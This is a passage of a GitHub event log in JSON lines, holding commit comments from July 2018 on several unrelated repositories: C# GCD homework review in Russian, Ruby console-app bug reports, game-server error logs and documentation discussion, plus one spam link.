<https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29597986>, \n\n\n> or mute the thread \n\n\n> <https://github.com/notifications/unsubscribe-auth/AeM1XnSmSfCKvNkXGCiQ3UR4Q-t8lfL-ks5uDPTNgaJpZM4VAt6f> \n\n\n> . \n\n\n> \n\n\n\n\n—\n\n\nYou are receiving this because you commented.\n\n\nReply to this email directly, view it on GitHub, or mute the thread.\n\n\n\n\n\n\n\n\n"}},"created_at":"2018-07-04T17:12:56Z"}
{"id":"7919506329","type":"CommitCommentEvent","actor":{"login":"juan-herrador"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29598089,"position":159,"line":260,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T17:13:29Z","updated_at":"2018-07-04T17:13:29Z","author_association":"OWNER","body":"I already sent an email to Brendan :)"}},"created_at":"2018-07-04T17:13:29Z"}
{"id":"7919507184","type":"CommitCommentEvent","actor":{"login":"jkramer"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":29598092,"position":null,"line":null,"path":null,"commit_id":"917a52afe3ed70edf429001d42f7d856242e883d","created_at":"2018-07-04T17:13:49Z","updated_at":"2018-07-04T17:13:49Z","author_association":"CONTRIBUTOR","body":"Oh my, I completely forgot that the online docs are built from this. Sorry for that, I reverted the commit!"}},"created_at":"2018-07-04T17:13:49Z"}
{"id":"7919509594","type":"CommitCommentEvent","actor":{"login":"Eysz7words"},"repo":{"name":"louisdh/subnet-manager-java"},"payload":{"comment":{"id":29598098,"position":1,"line":1,"path":"nbproject/build-impl.xml","commit_id":"84f096cc9d538872e960b5fab17c84d8cbb0c89a","created_at":"2018-07-04T17:14:39Z","updated_at":"2018-07-04T17:14:39Z","author_association":"NONE","body":"https://api.whatsapp.com/send?text=AirFloat%20iPA%20Download%20https://ipswbeta.com/airfloat-ipa-download/"}},"created_at":"2018-07-04T17:14:39Z"}
{"id":"7919510611","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29598101,"position":null,"line":null,"path":null,"commit_id":"84700719165770f50c5a164d27dee4a0f5c7a116","created_at":"2018-07-04T17:15:00Z","updated_at":"2018-07-04T17:15:00Z","author_association":"NONE","body":"интересно )\r\nтеперь поезд куда-то пропал...\r\n- был на Алматы\r\n- потом я его отправил вперед\r\n-  проверил станцию Астана, но она ничего не вывела\r\n- проверил Алматы - \"На станций нет поездов\"\r\nвот смотри:\r\n```\r\n$ ruby main.rb \r\n_________________\r\nВыберите пункт из списка:\r\n0.Добавить станцию\r\n1.Добавить поезд\r\n2.Добавить вагон\r\n3.Управление маршрутом\r\n4.Назначить маршрут поезду\r\n5.Добавить вагон к поезду\r\n6.Отцепить вагон от поезда\r\n7.Перемеcтить поезд по маршруту\r\n8.Просмотреть список станций\r\n9.список поездов на станции\r\n10.Для выхода из программы\r\n9\r\n_________\r\nALmaty\r\nAstana\r\nВведите имя станции:\r\nALmaty\r\n1. 1\r\n_________________\r\nВыберите пункт из списка:\r\n0.Добавить станцию\r\n1.Добавить поезд\r\n2.Добавить вагон\r\n3.Управление маршрутом\r\n4.Назначить маршрут поезду\r\n5.Добавить вагон к поезду\r\n6.Отцепить вагон от поезда\r\n7.Перемеcтить поезд по маршруту\r\n8.Просмотреть список станций\r\n9.список поездов на станции\r\n10.Для выхода из программы\r\n7\r\n_________\r\n1\r\n2\r\nВведите номер поезда:\r\n1\r\nВыберите куда вы хотите передвинуть поезд - 1.Вперед 2.Назат\r\n1\r\nКоманда выполнен успешно\r\n_________________\r\nВыберите пункт из списка:\r\n0.Добавить станцию\r\n1.Добавить поезд\r\n2.Добавить вагон\r\n3.Управление маршрутом\r\n4.Назначить маршрут поезду\r\n5.Добавить вагон к поезду\r\n6.Отцепить вагон от поезда\r\n7.Перемеcтить поезд по маршруту\r\n8.Просмотреть список станций\r\n9.список поездов на станции\r\n10.Для выхода из программы\r\n9\r\n_________\r\nALmaty\r\nAstana\r\nВведите имя станции:\r\nAstana\r\n_________________\r\nВыберите пункт из списка:\r\n0.Добавить станцию\r\n1.Добавить поезд\r\n2.Добавить вагон\r\n3.Управление маршрутом\r\n4.Назначить маршрут поезду\r\n5.Добавить вагон к поезду\r\n6.Отцепить вагон от поезда\r\n7.Перемеcтить поезд по маршруту\r\n8.Просмотреть список станций\r\n9.список поездов на станции\r\n10.Для выхода из программы\r\n9\r\n_________\r\nALmaty\r\nAstana\r\nВведите имя станции:\r\nAlmaty\r\nНа станций нет поездов\r\n_________________\r\n```\r\n"}},"created_at":"2018-07-04T17:15:00Z"}
{"id":"7919511059","type":"CommitCommentEvent","actor":{"login":"Ronimeister"},"repo":{"name":"Ronimeister/NET.S.2018.Kanunnikov.03"},"payload":{"comment":{"id":29598103,"position":11,"line":11,"path":"Algorithms/GCDFinder.cs","commit_id":"4ff58661eda38d9d564017029a28a9a1016daa30","created_at":"2018-07-04T17:15:10Z","updated_at":"2018-07-04T17:15:10Z","author_association":"OWNER","body":"Тогда еще пару вопросов)\r\n1) Тесты делать для всех реализаций метода? Т.е. для двух, трёх и т.д.?\r\n2) Делать ли реализацию этих методов используя out или достаточно tuple?\r\n\r\n\r\n\r\nBest regards, Alexey Kanunnikov.\r\n\r\n4 июля 2018 г., 20:12 пользователь Anzhelika Kravchuk <\r\nnotifications@github.com> написал:\r\n\r\n> Да, может быть и такой. Можно ещё добавить тесты со временем, выводя время\r\n> в debug, для того, чтобы, например, сравнить бинарный и классический.\r\n>\r\n>\r\n>\r\n>\r\n> ________________________________\r\n>\r\n>\r\n> Best regards, Anzhelika Kravchuk.\r\n>\r\n>\r\n>\r\n>\r\n>\r\n>\r\n>\r\n> От: Alexey Kanunnikov\r\n>\r\n>\r\n> Отправлено: среда, 4 июля, 20:04\r\n>\r\n>\r\n>\r\n> Тема: Re: [Ronimeister/NET.S.2018.Kanunnikov.03] Two Day-3 tasks added.\r\n> (4ff5866)\r\n>\r\n>\r\n> Кому: Ronimeister/NET.S.2018.Kanunnikov.03\r\n>\r\n>\r\n> Копия: Anzhelika Kravchuk, Comment\r\n>\r\n>\r\n>\r\n>\r\n>\r\n>\r\n> Т.е., в тестах будет примерно такой метод?\r\n>\r\n>\r\n> public int EuclideanGCD_IsCorrect(int firstNumber, int secondNumber, int\r\n>\r\n>\r\n> thirdNumber)\r\n>\r\n>\r\n> {\r\n>\r\n>\r\n> (int result, _) = GCDFinder.EuclideanGCD(firstNumber,\r\n>\r\n>\r\n> secondNumber, thirdNumber);\r\n>\r\n>\r\n> return result;\r\n>\r\n>\r\n> }\r\n>\r\n>\r\n>\r\n>\r\n>\r\n>\r\n>\r\n>\r\n>\r\n>\r\n> Best regards, Alexey Kanunnikov.\r\n>\r\n>\r\n>\r\n>\r\n> 4 июля 2018 г., 20:01 пользователь Anzhelika Kravchuk <\r\n>\r\n>\r\n> notifications@github.com> написал:\r\n>\r\n>\r\n>\r\n>\r\n> > Добрый вечер.\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > Я бы сказала, учитывая наличие valuetuple, что будут только\r\n> перегруженные\r\n>\r\n>\r\n> > версии методов возвращающие пару - значение и время.\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > ________________________________\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > Best regards, Anzhelika Kravchuk.\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > От: Alexey Kanunnikov\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > Отправлено: среда, 4 июля, 19:44\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > Тема: Re: [Ronimeister/NET.S.2018.Kanunnikov.03] Two Day-3 tasks added.\r\n>\r\n>\r\n> > (4ff5866)\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > Кому: Ronimeister/NET.S.2018.Kanunnikov.03\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > Копия: Anzhelika Kravchuk, Comment\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > Здравствуйте, есть вопрос по поводу задания на НОД: все перегруженные\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > методы(если я использую ValueTuple) должны возвращать время? Ну, т.е.,\r\n> во\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > всех ли публичных методах мне реализовывать подсчёт времени или дб. как\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > методы с временем, так и без него?\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > 3 июля 2018 г., 15:33 пользователь Anzhelika Kravchuk <\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > notifications@github.com> написал:\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > Вот эти методы EuclideanGCD(int firstNumber, int secondNumber, params\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > int[] numbers) + EuclideanGCD(int firstNumber, int secondNumber,\r\n> params\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > int[] numbers , out TimeSpan time ) , вообще взрывают мне мозг!\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > я не могу ничем оправдать этот int firstNumber, int secondNumber,\r\n> params\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > int[] numbers список параметров.\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > On 3 Jul 2018, at 15:30, Alexey <notifications@github.com> wrote:\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > Т.е., сделать методы а-ля EuclideanGCD(int firstNumber, int\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > secondNumber)\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > + EuclideanGCD(int firstNumber, int secondNumber, out TimeSpan time)\r\n> +\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > EuclideanGCD(int firstNumber, int secondNumber, params int[]\r\n> numbers)\r\n>\r\n>\r\n> > +\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > EuclideanGCD(int firstNumber, int secondNumber, params int[] numbers\r\n> ,\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > out\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > TimeSpan time ) ?\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > 3 июля 2018 г., 15:23 пользователь Anzhelika Kravchuk <\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > notifications@github.com> написал:\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > > Идея была хорошая, реализация не годиться. Что я хотела бы\r\n> увидеть,\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > как\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > > доступную публичную функциональность класса - это 3 (или 6 все\r\n>\r\n>\r\n> > зависит\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > от\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > > варианта возвращения времени счета) перегруженных версии для 1-го\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > алгоритма\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > > и 3 (или 6) для 2-го, при этом, я не должна передавать ничего\r\n> кроме\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > > числовых значений. А вот все остальное в плане избавления от копи\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > паста -\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > > на ваше усмотрение). Пользователь вашего кода должен знать только\r\n>\r\n>\r\n> > то,\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > что\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > > он использует именно указанную модификацию для указанного\r\n> количества\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > > числел, и опционально решать - нужно или нет ему время.\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > > —\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > > You are receiving this because you authored the thread.\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > > Reply to this email directly, view it on GitHub\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > > <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > 4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29579832>,\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > > or mute the thread\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > > <https://github.com/notifications/unsubscribe-\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > auth/AeM1XrCNbo4ym4xouuMi2d-VLvH4UI6Dks5uC2I4gaJpZM4VAt6f>\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > > .\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > —\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > You are receiving this because you commented.\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > > Reply to this email directly, view it on GitHub <https://github.com/\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > Ronimeister/NET.S.2018.Kanunnikov.03/commit/4ff58661eda38d9d564017029a28a9\r\n>\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > a1016daa30#commitcomment-29579922>, or mute the thread <\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > https://github.com/notifications/unsubscribe-auth/\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > AKCHstnt1g1M5dQDCbP8NuzPO5i1OLt_ks5uC2PVgaJpZM4VAt6f>.\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > —\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > You are receiving this because you authored the thread.\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > Reply to this email directly, view it on GitHub\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/\r\n>\r\n>\r\n> > 4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29579954>,\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > or mute the thread\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > <https://github.com/notifications/unsubscribe-auth/\r\n>\r\n>\r\n> > AeM1XkXiSLJkcVHW8q8lok4iYPhf0PhJks5uC2SrgaJpZM4VAt6f>\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > .\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > —\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > You are receiving this because you commented.\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > Reply to this email directly, view it on GitHub, or mute the thread.\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > —\r\n>\r\n>\r\n> > You are receiving this because you authored the thread.\r\n>\r\n>\r\n> > Reply to this email directly, view it on GitHub\r\n>\r\n>\r\n> > <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/\r\n> 4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29597986>,\r\n>\r\n>\r\n> > or mute the thread\r\n>\r\n>\r\n> > <https://github.com/notifications/unsubscribe-auth/\r\n> AeM1XnSmSfCKvNkXGCiQ3UR4Q-t8lfL-ks5uDPTNgaJpZM4VAt6f>\r\n>\r\n>\r\n> > .\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n>\r\n>\r\n> —\r\n>\r\n>\r\n> You are receiving this because you commented.\r\n>\r\n>\r\n> Reply to this email directly, view it on GitHub, or mute the thread.\r\n>\r\n>\r\n>\r\n>\r\n>\r\n>\r\n>\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29598083>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AeM1XrR_lp_66NeOHUZcC4z6zgv4NrQ7ks5uDPeYgaJpZM4VAt6f>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-04T17:15:10Z"}
{"id":"7919511556","type":"CommitCommentEvent","actor":{"login":"juan-herrador"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29598106,"position":169,"line":270,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T17:15:21Z","updated_at":"2018-07-04T17:15:21Z","author_association":"OWNER","body":":D I already created a PR for the initial state of the player having certain items, and I changed this function to expect an array. I modified your call too\r\nhttps://github.com/juan-herrador/delicious-world-dev/pull/2"}},"created_at":"2018-07-04T17:15:21Z"}
{"id":"7919513553","type":"CommitCommentEvent","actor":{"login":"juan-herrador"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29598117,"position":185,"line":286,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T17:16:03Z","updated_at":"2018-07-04T17:16:03Z","author_association":"OWNER","body":"The event can be the same. Both handlers can call the same event specifying the origin. "}},"created_at":"2018-07-04T17:16:03Z"}
{"id":"7919515268","type":"CommitCommentEvent","actor":{"login":"Cpaztik"},"repo":{"name":"AsYetUntitled/Framework"},"payload":{"comment":{"id":29598125,"position":null,"line":null,"path":null,"commit_id":"dcdf8f6d78b67d7851ce3276a8af64ab581bbb93","created_at":"2018-07-04T17:16:41Z","updated_at":"2018-07-04T17:16:41Z","author_association":"NONE","body":"`Error in expression <playtime_values_request pushBack [_uid, _new];\r\n};\r\n[_uid,_new select 2] call TON_>\r\n  Error position: <_new];\r\n};\r\n[_uid,_new select 2] call TON_>\r\n  Error Undefined variable in expression: _new\r\nFile \\life_server\\Functions\\MySQL\\fn_queryRequest.sqf [DB_fnc_queryRequest], line 178\r\nError in expression <) isEqualTo _uid) exitWith {\r\n_x set [1, _time_gathered];\r\n_x set [2, time];\r\n};\r\n} >\r\n  Error position: <_time_gathered];\r\n_x set [2, time];\r\n};\r\n} >\r\n  Error Undefined variable in expression: _time_gathered\r\nFile \\life_server\\Functions\\PlayTime\\fn_setPlayTime.sqf [TON_fnc_setPlayTime], line 24\r\nError in expression <fnc_playtime_values_request find [_uid, _new];\r\nif (_index != -1) then {\r\nTON_fnc_>\r\n  Error position: <_new];\r\nif (_index != -1) then {\r\nTON_fnc_>\r\n  Error Undefined variable in expression: _new\r\nFile \\life_server\\Functions\\MySQL\\fn_queryRequest.sqf [DB_fnc_queryRequest], line 172`\r\n\r\nalso \r\n\r\n`Error in expression <playtime_values_request pushBack [_uid, _new];\r\n};\r\n[_uid,_new select 2] call TON_>\r\n  Error position: <_new];\r\n};\r\n[_uid,_new select 2] call TON_>\r\n  Error Undefined variable in expression: _new\r\nFile \\life_server\\Functions\\MySQL\\fn_queryRequest.sqf [DB_fnc_queryRequest], line 178\r\nTransfer of uninitialized variables is not supported\r\nError in expression <) isEqualTo _uid) exitWith {\r\n_x set [1, _time_gathered];\r\n_x set [2, time];\r\n};\r\n} >\r\n  Error position: <_time_gathered];\r\n_x set [2, time];\r\n};\r\n} >\r\n  Error Undefined variable in expression: _time_gathered\r\nFile \\life_server\\Functions\\PlayTime\\fn_setPlayTime.sqf [TON_fnc_setPlayTime], line 24\r\nError in expression <fnc_playtime_values_request find [_uid, _new];\r\nif (_index != -1) then {\r\nTON_fnc_>\r\n  Error position: <_new];\r\nif (_index != -1) then {\r\nTON_fnc_>\r\n  Error Undefined variable in expression: _new\r\nFile \\life_server\\Functions\\MySQL\\fn_queryRequest.sqf [DB_fnc_queryRequest], line 172`"}},"created_at":"2018-07-04T17:16:41Z"}
{"id":"7919515296","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29598126,"position":13,"line":31,"path":"code/Language/Drasil/Chunk/Eq.hs","commit_id":"b032040f259db486b4b1e988784879bb81cb9d00","created_at":"2018-07-04T17:16:41Z","updated_at":"2018-07-04T17:16:41Z","author_association":"OWNER","body":"That data definitions use `QDefinition` is *fine*. What is not fine is to have 'raw' `QDefinition`s. Using the notes section of DD is fine and that can certainly go ahead."}},"created_at":"2018-07-04T17:16:41Z"}
{"id":"7919524227","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29598149,"position":null,"line":null,"path":null,"commit_id":"84700719165770f50c5a164d27dee4a0f5c7a116","created_at":"2018-07-04T17:19:56Z","updated_at":"2018-07-04T17:19:56Z","author_association":"NONE","body":"удаление вагонов тоже как-то странно продолжает работать\r\nможно удалять вагоны с придуманными номерами\r\nи можно делать это несколько раз с одним и тем же номером\r\nпрограмма будет докладывать \"Команда выполнен успешно\"\r\nкакая-то нестыковочка\r\n```\r\n$ ruby main.rb \r\n_________________\r\nВыберите пункт из списка:\r\n0.Добавить станцию\r\n1.Добавить поезд\r\n2.Добавить вагон\r\n3.Управление маршрутом\r\n4.Назначить маршрут поезду\r\n5.Добавить вагон к поезду\r\n6.Отцепить вагон от поезда\r\n7.Перемеcтить поезд по маршруту\r\n8.Просмотреть список станций\r\n9.список поездов на станции\r\n10.Для выхода из программы\r\n6\r\n_________\r\n1\r\n2\r\nВыберите номер ПОЕЗДА:\r\n1\r\nВыберите вагона\r\n44\r\nКоманда выполнен успешно\r\n_________________\r\nВыберите пункт из списка:\r\n0.Добавить станцию\r\n1.Добавить поезд\r\n2.Добавить вагон\r\n3.Управление маршрутом\r\n4.Назначить маршрут поезду\r\n5.Добавить вагон к поезду\r\n6.Отцепить вагон от поезда\r\n7.Перемеcтить поезд по маршруту\r\n8.Просмотреть список станций\r\n9.список поездов на станции\r\n10.Для выхода из программы\r\n6\r\n_________\r\n1\r\n2\r\nВыберите номер ПОЕЗДА:\r\n1\r\nВыберите вагона\r\n44\r\nКоманда выполнен успешно\r\n_________________\r\nВыберите пункт из списка:\r\n0.Добавить станцию\r\n1.Добавить поезд\r\n2.Добавить вагон\r\n3.Управление маршрутом\r\n4.Назначить маршрут поезду\r\n5.Добавить вагон к поезду\r\n6.Отцепить вагон от поезда\r\n7.Перемеcтить поезд по маршруту\r\n8.Просмотреть список станций\r\n9.список поездов на станции\r\n10.Для выхода из программы\r\n```"}},"created_at":"2018-07-04T17:19:56Z"}
{"id":"7919528503","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":29598152,"position":null,"line":null,"path":null,"commit_id":"917a52afe3ed70edf429001d42f7d856242e883d","created_at":"2018-07-04T17:21:26Z","updated_at":"2018-07-04T17:21:26Z","author_association":"CONTRIBUTOR","body":"Please don't take it that way... That was absolutely not my intention. We\nare very grateful for the contribution, it's just a matter of identifying\nit properly to avoid confusions. If it's your decision to revert the\ncommit, so be it, but it's better if you add something like @zoffixznet\nsays (in the IRC channel) identifying the release when it will be\navailable.\n"}},"created_at":"2018-07-04T17:21:26Z"}
{"id":"7919531488","type":"CommitCommentEvent","actor":{"login":"panayiotisiacovou"},"repo":{"name":"panayiotisiacovou/hello"},"payload":{"comment":{"id":29598156,"position":4,"line":4,"path":"main.cpp","commit_id":"6c0237822f15ddd3fdca0c0ad7567db66a0ec981","created_at":"2018-07-04T17:22:28Z","updated_at":"2018-07-04T17:22:28Z","author_association":"OWNER","body":"sasto\r\n"}},"created_at":"2018-07-04T17:22:28Z"}
{"id":"7919531696","type":"CommitCommentEvent","actor":{"login":"gibaBR"},"repo":{"name":"gibaBR/XCI-Organizer"},"payload":{"comment":{"id":29598158,"position":null,"line":null,"path":null,"commit_id":"109bed26c6e81037a89798d392788fcd8b2b2dd7","created_at":"2018-07-04T17:22:32Z","updated_at":"2018-07-04T17:22:32Z","author_association":"OWNER","body":"First, a huge thank you for your help!!\n\nI was able to reproduce the error and I`ll try to explain it:\n\nImagine you have those folders and files inside them\n\n1 2 Switch (bbb-h-aaccap.xci)\n3D MiniGolf (3D MiniGolf.xci)\n88 Heroes 98 Heroes Edition (bbb-h-aflja.xci)\nA.O.T.2.USA (bbb-h-aecnb.xci)\nARMS (bbb-h-aabqap.xci)\n\nWhen you click the batch trim button you create a list of files on the\n\"files\" variable that are sorted by Folder name-> File name):\n\n\n\n\nBut inside the foreach loop the First file is actualy #D Minigolf, so\nTB_Name.Text.ToString() = \"3D MiniGolf\".\n\nThe actual list that apears on the Listbox at runtime is this:\n\nAlphabetic filename order!!\n\nActualy I found the \"problem\": Its inside the UpdateFileList Method:\n\nfiles = files.OrderBy(a => Path.GetFileNameWithoutExtension(a)).ToList();\n\n\nWhat do you think? Maybe we could use other aproach.\n\n\n[]`s\n\n\n\n---\nGilberto Júnior\nhttp://raspberrybrasil.blogspot.com.br/\nhttp://www.flickr.com/photos/gibajr/\n\nOn Wed, Jul 4, 2018 at 12:48 PM, StudentBlake <notifications@github.com>\nwrote:\n\n> What wasn't working properly? The only situation I can think of is if you\n> load the program, change the filenames without refreshing, then try a batch\n> job. If that's the case, wouldn't it be easier to do something like this?\n>\n> //Make sure lboxFiles is up to date to match files\n> UpdateFileList();\n> files = Util.GetXCIsInFolder(selectedPath);\n>\n> I'm curious as to what broke because. (I did end up destroying a few XCI\n> in the process of making this feature lol)\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> 